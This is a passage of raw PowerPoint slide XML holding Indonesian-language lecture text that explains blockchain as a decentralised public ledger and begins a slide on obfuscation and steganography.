            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>transaksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sendiri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Blockchain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dicatat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>buku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Buku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>individu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>namun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, salah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karakteristik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terpenting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> blockchain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terdesentralisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Buku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>didistribusikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seluruh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> peer-to-peer (P2P) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>titik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kegagalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kompromi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, para </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Blockchain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mempercayai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lain. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Demikian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kualitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lain yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menentukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> blockchain Adalah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keterbukaannya-setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> orang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemampuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melihat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>transaksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada blockchain.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Teknologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> blockchain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>macam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Teknologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>integritas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>transparansi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>transaksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keuangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hukum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlindungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cipta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kekayaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>intelektual</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (IP), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemungutan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>suara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> online, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>identitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data.</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58</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33537834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Obfuscation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pengaburan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seni</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sulit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditemukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketidakjelasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Akan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengaburan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Steganografi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harfiah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> "tulisan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersembunyi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>") </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyematkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terduga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disembunyikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gambar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
